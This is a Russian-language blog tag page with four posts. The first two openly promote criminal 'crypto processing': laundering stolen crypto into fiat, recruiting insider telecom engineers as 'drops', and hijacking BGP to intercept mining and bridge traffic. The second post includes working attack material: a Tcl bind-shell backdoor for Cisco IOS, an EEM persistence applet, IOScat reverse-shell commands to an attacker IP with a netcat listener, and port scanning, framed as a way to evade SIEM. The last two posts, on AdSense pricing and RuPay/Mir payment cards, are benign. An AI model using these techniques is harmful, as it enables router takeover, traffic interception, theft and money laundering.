Tag: процессинг

  • Как найти реального процессора крипты

    Как найти реального процессора крипты

    Своего первого реального партёра по процессингу крипты, который показал мне как можно использовать сценарий bgp spoofing и реализовывать bgp hijacking для mitm на майнинг и мутить процессинг в крипте при помощи подмены маршрута в зоне bgp, я нашел случайно, когда еще трудился в Укртелекоме сменным инженером, немного подрабатывая настраивая сетевое оборудование налево, но потом этот человек отошел от дел в связи со слишком уж скользкой ситуацией в данной сфере, и я решил поискать партнера на форумах типа Darkmoney, разместив рекламу на трёх электронных досках объявлений. Честно говоря поначалу даже был готов сразу закинуть 10.000 долларов в Гарант, но потом призадумался, а стоит ли?

    Как найти реального процессора крипты


    И ко мне начал обращаться народ обращается разных категорий…

    1. Дебильная школота, которая что-то любит повтирать про свою серьезность и просит закинуть 10.000 USDT им на Coinbase или Huobi в качестве аванса.

    2. Реальные мэны, которые льют сразу большую сумму в крипте и просят организовать им вывод в фиат по SWIFT без разговоров про гарантии и прочую шнягу, но после того, как им отдаёшь нал или отбиваешь MT103, они сразу пропадают, суть данных действий я так и не понял, зачем пропадать, если всё прошло итак гладко? 
    3. Мутные личности, берущие реквизиты криптокошелька и очень долго что-то пытающиеся залить в USDT, в итоге пропадают, хорошо если еще криптокошелёк после всех этих проделок с процессингом в крипте остаётся жив и не вносится в стоп листы криптовалютных бирж и обменников.

    4. Серьезные судя по общению цисководы, очень долго насилуют мозг спрашивая про отзывы и сумму которую я смогу закинуть в Гарант, после того, как им предлагаю первыми закинуть Гаранту его комиссию, так как в случае их исчезновения я попадаю на комиссию, сразу сваливаются, стуча копытами или кричат что я кидала, так как отказываюсь от работы с их Гарантом.

    5. Самые адекватные те, кто льет небольшую проверочную сумму и потом уже начинают лить в крипте серьезные деньги с жирных криптовалютных кошельков BitCoin или Etherium, но таких, к сожалению, попадается очень мало.
    Итог моей работы в паблике: вложения примерно – 150.000 долларов США, которые с трудом окупились из за убитых фирм и банковских счетов, пластиковых карт, и учёток на криптобиржах и обменниках, которые продавцы лочат через 2 месяца после продажи, и прочих прелестей. Если люди обращаются по рекламе – тут уже не отличишь нормальных от ненормальных, для тех, кто обратился в первый раз, есть гостевой криптокошелёк, без привязки к биржам и другим сервисам, реквизиты которого даю всем подряд, на который можно лить крипту из любой помойки, а проверенным людям – уже потом предоставляю новые реки чистого криптокошелька, гостевой корпоративный счёт желательно постоянно проверять на работоспособность перед зачислением о отправкой на него денег с обменника или криптобиржи.
    Найти сейчас грамотного человека, кто будет реально лить хорошие суммы в крипте стабильно вполне возможно, но для этого его нужно чем-либо заинтересовать, чтобы он согласился работать именно с тобой и ни с кем другим. Вы наверное сами всё хорошо знаете, что предложение обнала грязной крипты с выводом в фиат в сотни раз превышает число реальных людей, умеющих лить крипту через интернет с использованием техник mitm майнинга по сценарию bgp spoofing с реализацией bgp hijacking, которые ищут себе грамотных обнальных партнёров по обмену грязной крипты на фиат. 

    Однако, серьезных людей, которые кое-что понимает про bgp в криптоканалах, всегда можно заинтересовать своими хорошими связями в телекоммуникационной среде среде, умением решать любые скользкие вопросы в том или ином небольшом или скажем совсем скромном банке (а как вам уже наверное стало понятно, что ни один серьёзный процессор крипты не будет связываться с публичным банком), либо может пригодиться ваш предыдущий опыт работы в крупной телекоммуникационной компании, как это было в моём случае. 

    Можно также попытаться сработать с грамотным человеком, предоставив ему данные телеметрии OSS FM/PM системы какого-нибудь крупного телекоммуникационного холдинга, включая распечатку IP/MPLS сообществ – это значительно упростит или даже ускорит реализацию той или иной схемы процессинга крипты через mitm с майнинга и реализации bgp hijacking по сценарию bgp spoofing. С этой задачей вполне может справиться любой социализированный дроп, работающией сетевым инженером в такой крупной компании, маргинальные дропы для такой работы не годятся.
     

    Хочу добавить, что все серьёзные люди, занимающиеся процессингом крипты после всем известных нам событий уехали за границу года три тому назад, и работают от туда, а работать с теми, кто остался по выводу крипты в рублевом пространстве – сплошной нудняк. Новичку без связей в банковской или телекоммуникационной среде влиться в эту тему просто нереально, если только не надеяться на чудо.

  • Перехват и подмена bgp-сессии при помощи Cisco TCL

    Перехват и подмена bgp-сессии при помощи Cisco TCL

    Обычно мониторинг ситуаций, связанных с перехватом трафика через bgp затруднен и в siem очень трудно отследить что-то связанное с изменением маршрутов трафика при помощи внедрения bgp нарушителем. Поговорим немного о том, как можно использовать маршрутизатор Cisco Systems с привилегированным доступом level 15, что позволяет для реализации сценариев bgp spoofing с использованием встроенного в него функционала скриптового движка TCL.
    Вариантов изменения маршрутов (создание bgp обхода) в сети Интернет может быть несколько, однако самый простой из них — получению доступа к роутеру, а уже эту задачу можно решать различными способами и методами, мне на ум пришло несколько таких: 
    • Брутфорс пароля от интерфейса управления BGP;
    • Получение доступа посредством угона почты/аккаунта/компьютера одного из сотрудников или администраторов какого-нибудь провайдера (который рулит этим bgp роутером);
    • Поиск или эксплуатация уже существующих багов в BGP-сервере для обхода, запущенном на Linux-машине (по моему опыту, это чаще всего это Bird, Quagga (FRR) или же это будет стандартный девайс Cisco, Juniper или Huawei);
    • Получение доступа к управлению софтовым маршрутизатором BGP через сторонние сервисы, запущенные на этом же Linux-сервере;
    • «Вклинивание» в уже установленную BGP сессию между определенными узлами, но об этом мы поговорим чуточку позже, или напишите мне в личку. 
    Сейчас я опишу несколько вариантов реализации mitm bgp метода, и поверь, их использование действительно приводит к повышению прав на, якобы, защищенном маршрутизаторе под управлением Cisco IOS. Тебе это сильно пригодится для более глубокого осмысления роли bgp в криптоканалах как раз для создания своего bgp сервера для обхода и приземления нужного тебе трафика на свой мост. 

    Перехват bgp-сессии в Ростелекоме
    Tcl – это Tool Command Language, язык сценариев, часто применяемых с графической библиотекой Tk, был придуман в начале 80-х годов и из-за своей простоты продолжает повсеместно использоваться как встроенный в различные приложения; вспомним хотя бы программы expect или irc-ботов eggdrop, а также использование его как модуля к серверной части apache mod_tcl. В операционную систему Cisco IOS, используемую маршрутизаторами Cisco Systems, интерпретатор Tcl был внедрён начиная с версии IOS 12.3(2)T, что позволило реализовать в маршрутизаторах Cisco Systems функции выполнения “пользовательских” скриптов. Как наиболее часто встречаемый пример, использование IOS IVR для создания интерактивных голосовых меню в системах IP-телефонии.
    Используя функционал Tcl, мы имеем возможность работать с сокетами, в данном случае открывается некоторая перспектива использования маршрутизатора под управлением Cisco IOS для следующих действий:
    • Разработки собственного варианта “бэкдора” с целью закрепления системы и доступа к ней в обход штатных механизмов защиты;
    • Перехват bgp-сессии с подменой маршрутов или внедрением своего маршрута; 
    • Проведения сканирования портов в различных сегментах сети;
    • Проброса действующих портов на порт интерфейса, организации обратного (реверсного) доступа к удаленным устройствам;
    • Процессинг крипты через подмену маршрута bgp до криптомоста с китами и подмена смартконтрактов на этом мосте;
    • Создание bgp обхода для инфильтрации трафика на своём оборудовании;
    • Разработки вариантов скриптов для возможности перебора паролей (брутфорса) различных устройств и серверов в сети.

    Данными методами также можно воспользоваться для процессинга крипты, получив доступ к TFTP-серверу телеком провайдера, где размещены существующие активные TCL-сценарии и принудительно заменить существующий сценарий на собственный, предназначенный для реализации bgp spoofing сценария или создания bgp сервера для обхода криптомоста с последующим приземлением трафика китов на свой мост. В этом случае произойдет загрузка именно твоего сценария TCL и запуск его на граничном bgp-маршрутизаторе.

    Практикуемся

    Давай попробуем понять, как это можно реализовать с помощью удаленного шелла, который можно использовать без явной аутентификации с входом на назначенный порт по протоколу Telnet. Подобный сценарий недавно использовался в качестве задания на соревнованиях “Рускрипто CTF“.
    В первую очередь давай разберем, как работает Tcl на устройствах под управлением Cisco IOS.

    Загрузка и исполнение TCL-скрипта:

    Для первичной загрузки TCL-скриптов необходимо иметь привилегированный доступ не ниже уровня 15 enable. Скрипт Tcl необходимо загружать удаленно на маршрутизатор Cisco, для этого можно использовать такие протоколы, как TFTP, FTP, RCP, SCP. Загрузку и выполнение скрипта можно выполнять как напрямую в RAM-маршрутизатора, так и в FLASH-память c последующим его запуском с файловой системы Cisco IOS.
    Вот так выглядит загрузка скрипта во FLASH память и последующее его выполнение:
    Router# copy tftp://192.168.1.4/script.tcl flash://script.tcl
    Router# tclsh flash://script.tcl
    Загрузка скрипта непосредственно с TFTP-сервера:
    Router# tclsh tftp://192.168.1.4/script.tcl
    Ниже приведен пример TCL-скрипта, который при запуске захватывает сокет на порт TCP/2002 и связывает его с интерфейсом командной строки (EXEC). Загрузка скрипта выполняется методами, описанными выше (в приведенном примере с сервера TFTP).
    proc callback {sock addr port} { 
    fconfigure $sock -translation crlf -buffering line
    puts $sock "Cisco router admin console:" 
    puts $sock " " 
    puts -nonewline $sock "Router# "
    flush $sock
    fileevent $sock readable [list echo $sock] 


    proc echo {sock} {
    global var

    flush $sock

    if {[catch {gets $sock line}] || 
    [eof $sock]} {
    return [close $sock]
    }

    catch {exec $line} result
    if {[catch {puts $sock $result}]} {
    return [close $sock]
    }

    puts -nonewline $sock "Router# "
    flush $sock
    }

    set port 2002
    set sh [socket -server callback $port] 
    vwait var 
    close $sh
    После загрузки и последующего запуска вышеприведенного сценария появится возможность зайти в систему режим EXEC без использования учетных записей и выполнять любые команды с использованием привилегий супер-пользователя level 15.
    [ptsec@maxpatrol ~]$ telnet router 2002
    Trying 192.168.1.10...
    Connected to router.
    Escape character is '^]'.

    Cisco router admin console:

    Router#
    Далее я бы хотел рассказать о некоторых ограничениях, которые необходимо помнить при работе с Tcl на устройствах под управлением Cisco IOS. В ранних версиях Cisco IOS, включающих поддержку Tcl, скрипт продолжал свою работу даже при прерывании EXEC-сессии. В новых версиях последовало исправление, которое завершает работу скрипта при обрыве линии или по команде clear line. Этот “патч-фикс” производителя можно обойти несколькими способами:
    1. На линиях, (console 0 или vty 0 4), с которых запускается скрипт, применить команду exec-timeout 0 0, в противном случае по завершении сессии пользователя скрипт завершит свою работу.
    Router>en
    Router#conf t
    Enter configuration commands, one per line. End with CNTL/Z.
    Router(config)#line vty 0 4
    Router(config-line)#exec-timeout 0 0
    2. Производить запуск сценария с использованием апплетов EEM (Embedded Event Manager) по триггеру, которым может быть любое действие, в том числе периодический запуск по таймеру. На примере ниже показана конфигурация Cisco IOS, которая загружает скрипт с TFTP сервера после запуска маршрутизатора по истечении 20 секунд.
    Router(config)# event manager applet BACKDOOR
    Router(config-applet)# event timer countdown name Delay time 20
    Router(config-applet)# action 1.0 cli command "enable"
    Router(config-applet)# action 1.1 cli command "tclsh tftp://192.168.1.4/script.tcl"
    Router(config-applet)# action 1.2 syslog msg "Backdoor is executed"
    3. Конвертировать TCL-сцкнарий в формат политик EEM (Embedded Event Manager) и запускать их по триггеру, которым может быть любое действие, в том числе периодический запуск по таймеру.

    Готовые утилиты и сценарии bgp spoofing

    В ряде ситуаций можно использовать готовые сценарии, такие как IOScat и IOSmap, входящие в IOScat, позволяющие осуществлять проброс портов, прием и передачу файлов путем манипуляций с сокетами. Используя встроенный в Cisco IOS язык TCL, можно использовать маршрутизатор аналогично ПК с установленным приложением Netcat, предварительно загрузив скрипт TCL во flash-память маршрутизатора или через TFTP-сервер напрямую в RAM. Методика загрузки и установки TCL-скрипта на маршрутизатор описана выше.

    Примеры реализации:

    Организация бэкдора на маршрутизаторе (2002 порт):
    Router# tclsh tftp://192.168.1.4/ioscat.tcl -ip2002 –oe
    Организация реверсного шелла на нужный IP адрес сервера обхода bgp (порт 12345):
    Router# tclsh tftp://192.168.1.4/ioscat.tcl -ie -oa192.168.1.4 -op12345
    (на твоей машине приемником шелла выступает обычный netcat: nc -l -p 12345)
    Проброс удаленного порта на локальный порт маршрутизатора (2002):
    Router# tclsh tftp://192.168.1.4/ioscat.tcl -ip2002 -oa192.168.2.1 -op80
    У данного сценария есть много других примеров, например копирование файлов с использованием сокетов, имитация телнет-сессии на удаленном хосте и много других функций, которые можно посмотреть на сайте разработчика.
    Сценарий с названием IOSmap – не что иное, как попытка создать аналог сканера nmap, конечно, в урезанном функционале, но в данном случае достаточно эксклюзивным для работы в среде Cisco IOS. Функционал этого TCL-скрипта позволяет производить сканирование диапазонов IP-адресов на открытые TCP/UDP-порты, в том числе используя метод инвентаризации хостов посредством протокола ICMP.
    Рассмотрим примеры использования:
    Router>en
    Router#tclsh tftp://192.168.1.4/iosmap.tcl 192.168.1.1-5 -p20-24,80,443
    Loading iosmap.tcl from 192.168.1.4 (via FastEthernet0/0): !
    [OK - 15912 bytes]

    Loading services.list from 192.168.1.4 (via FastEthernet0/0): !
    [OK - 42121 bytes]

    Starting IOSmap 0.9 ( http://www.defaultroute.ca ) at 2002-03-01 02:59 UTC

    Free Memory on Platform = 29038388 / Memory required for this scan = 2622514

    Host 192.168.1.1 is unavailable

    Host 192.168.1.2 is unavailable

    Host 192.168.1.3 is unavailable

    Interesting ports on host 192.168.1.4
    PORT STATE SERVICE
    20/tcp closed ftp-data
    21/tcp closed ftp
    22/tcp closed ssh
    23/tcp closed telnet
    24/tcp closed priv-mail
    80/tcp open http
    443/tcp closed https

    Host 192.168.1.5 is unavailable

    Router#
    Изменение вариантов сканирования скрипта возможно путем добавления аргументов:
    -sP – только по ответу хоста;
    -sT – TCP-портов методом TCP connect;
    -sU – UDP-портов через функционал IP SLA.
    Учитывая богатые возможности языка ТСL, можно разработать множество подобных, интересных приложений для реализации их в сетевой среде на оборудовании под управлением Cisco IOS для применения в локальной вычислительной сети провайдера для реализации bgp spoofing сценариев.

    Как скрыться от SIEM

    Имея возможность запускать сценарии TCL, также интересно иметь возможность отследить их исполнение в среде Cisco IOS. Сделать это можно, подсмотрев процессы и состояние портов на маршрутизаторе, используя следующие команды маршрутизатора:
    Router#show processes cpu | i Tcl
    212 2284 17762 128 3.68% 2.88% 0.67% 162 Tcl Serv - tty16

    Router#show tcp brief all
    TCB Local Address Foreign Address (state)
    659CDABC 192.168.1.10.23 192.168.1.4.5163 ESTAB
    654485B4 *.2002 *.* LISTEN
    65CA2D04 *.80 *.* LISTEN
    Начиная с версии IOS 12.4(4)Т появилась возможность использования CPP (Control Plane Policy):
    Router#show control-plane host open-ports
    Active internet connections (servers and established)
    Prot Local Address Foreign Address Service State
    tcp *:23 *:0 Telnet LISTEN
    tcp *:23 192.168.1.4:1379 Telnet ESTABLIS
    tcp *:80 *:0 HTTP CORE LISTEN
    tcp *:1234 *:0 Tcl Serv - tty163 LISTEN


    Устройства под управлением Cisco IOS в 1999 и 2024

    Инженер электросвязи шатает BGP

    Таким образом, все поняли, что любую, даже самую защищенную провайдерскую Cisco можно захватить умело написанным и запущенным TCL-сценарием. В итоге ты получаешь шелл для манипулирования трафиком в глобальной сети Интернет для реализации нужных тебе сценариев bgp spoofing для проведения mitm с криптой со всеми вытекающими отсюда последствиями.
  • Как поднять цену за просмотры на канале YouTube?

    Цена за тысячу просмотров видео на YouTube в программе Google AdSense зависит от нескольких факторов, включая:

    • Тематику объявления. Объявления, связанные с высококонкурентными темами, как правило, имеют более высокую цену за показ, чем объявления, связанные с менее конкурентными темами.
    • Целевой рынок. Объявления, которые нацелены на аудиторию с высоким доходом или высоким уровнем заинтересованности, как правило, имеют более высокую цену за показ, чем объявления, которые нацелены на аудиторию с более низким доходом или более низким уровнем заинтересованности.
    • Конкуренция. Чем больше рекламодателей конкурируют за показ объявления на определенном месте, тем выше будет цена за его просмотр.
    • Качество объявления. Объявления, которые хорошо написаны и соответствуют интересам пользователя, как правило, имеют более высокую цену за показ, чем объявления, которые плохо написаны или не соответствуют интересам пользователя.

    Стоимость просмотра объявлений Google AdSense по странам и континентам

    Вот несколько дополнительных факторов, которые могут повлиять на цену просмотра видео на YouTube:

    • Время суток. В некоторые дни и часы цена за показ объявления может быть выше, чем в другие.
    • Местоположение пользователя. Цена за просмотр объявления может отличаться в зависимости от страны или региона пользователя.
    • Устройство пользователя. Цена за показ объявления может отличаться в зависимости от того, использует ли пользователь компьютер, планшет или смартфон.

    в Google AdSense используют аукционную систему для определения цены за просмотры объявления. В этом аукционе рекламодатели конкурируют за показ своих объявлений на определенных местах. Победитель аукциона платит цену, которую он предложил, за каждого пользователя, который просмотрит его рекламное объявление.

    Владельцы сайтов и каналов YouTube могут контролировать, какие типы объявлений будут отображаться на их сайтах. Они также могут управлять ценой, которую они готовы платить за показ объявления на их сайте или канале.

    Вот несколько советов для повышения цены просмотров рекламы на вашем сайте:

    • Сосредоточьтесь на высококонкурентных темах.
    • Нацельте свою рекламу на аудиторию с высоким доходом или высоким уровнем заинтересованности.
    • Создайте качественные объявления, которые соответствуют интересам пользователя.
    • Оптимизируйте свой сайт для повышения CTR.

    CTR, или коэффициент кликабельности, — это процент пользователей, которые нажимают на объявление после того, как видят его. Чем выше CTR, тем выше будет цена за клик. Кроме того, на ставки показа объявлений на сайте или канале YouTube влияет вовлечённость пользователя и его интересы, предыдущий покупательский опыт на других сайтах.

  • Платежи от Google AdSense скоро можно будет получать через RuPay

    Платежи от Google AdSense скоро можно будет получать через RuPay

    Россия и Индия изучают возможность взаимного признания систем RuPay (Индия) и МИР (Россия). Такой шаг поможет пользователям Google AdSense в России делать платежи и снимать наличные средства в индийских рупиях и российских рублях

    Как получать платежи от Google AdSense в России

    Взаимное признание систем RuPay и Мир: что это значит и какие перспективы

    Решение изучить эту возможность приняли на Межправительственной комиссии по торгово-экономическому, научно-техническому и культурному сотрудничеству, где принимали участие представители России и Индии.

    Также стороны изучат вопрос использования российской системы передачи финансовых сообщений для обслуживания международных платежей между Индией и РФ.

    Это взаимодействие платежных систем очень важно для преодоления санкций, наложенных Западом. Согласно данным индийской стороны, российский экспорт с апреля 2022 года по январь 2023 года вырос в 4 раза и связан с увеличением поставок нефти и угля. Чтобы обслуживать торговые потоки странам требуется обеспечить систему расчетов.

    Что такое взаимное признание платежных систем?

    Взаимное признание платежных систем RuPay и Мир означает, что карты одной системы будут приниматься в банкоматах и торговых точках другой страны. То есть, россияне смогут расплачиваться картами Мир в Индии, а индийцы – картами RuPay в России.

    Почему это важно?

    • Расширение географии платежей. Для граждан обеих стран это означает возможность более удобных и безопасных платежей за границей.
    • Укрепление экономических связей. Взаимное признание платежных систем способствует развитию торгово-экономических отношений между Россией и Индией.
    • Альтернатива международным платежным системам. Это создает альтернативу международным платежным системам, таким как Visa и Mastercard, что снижает зависимость от иностранных финансовых институтов.

    Какие перспективы открывает взаимное признание RuPay и Мир?

    • Развитие туризма. Увеличение потока туристов между странами благодаря удобству расчетов.
    • Рост электронной коммерции. Расширение возможностей для онлайн-покупок товаров и услуг между Россией и Индией.
    • Создание финансовой инфраструктуры. Создание более независимой и устойчивой финансовой инфраструктуры в обеих странах.
    • Глубокая интеграция экономик. В долгосрочной перспективе это может привести к более глубокой интеграции экономик России и Индии.

    Какие шаги еще предстоит сделать?

    • Техническая интеграция. Необходимо обеспечить совместимость платежных систем, разработать единые стандарты и протоколы.
    • Регулирование. Требуется согласование нормативно-правовой базы, чтобы обеспечить безопасность платежей и защиту прав потребителей.
    • Маркетинг и продвижение. Необходимо активно продвигать новые возможности для граждан и бизнеса.

    Какие могут быть сложности?

    • Технические препятствия. Возможны сложности при интеграции различных платежных систем.
    • Регуляторные ограничения. Могут возникнуть разногласия по поводу регулирования платежных систем в каждой из стран.
    • Безопасность. Необходимо обеспечить высокий уровень безопасности платежей, чтобы предотвратить мошенничество.

    Взаимное признание систем RuPay и Мир – это важный шаг в развитии финансовых отношений между Россией и Индией. Это открывает новые возможности для граждан и бизнеса, в том числе для получения платежей Google AdSense в России через индийские платёжные системы и банки, укрепляет экономические связи между странами и способствует созданию более независимой финансовой системы.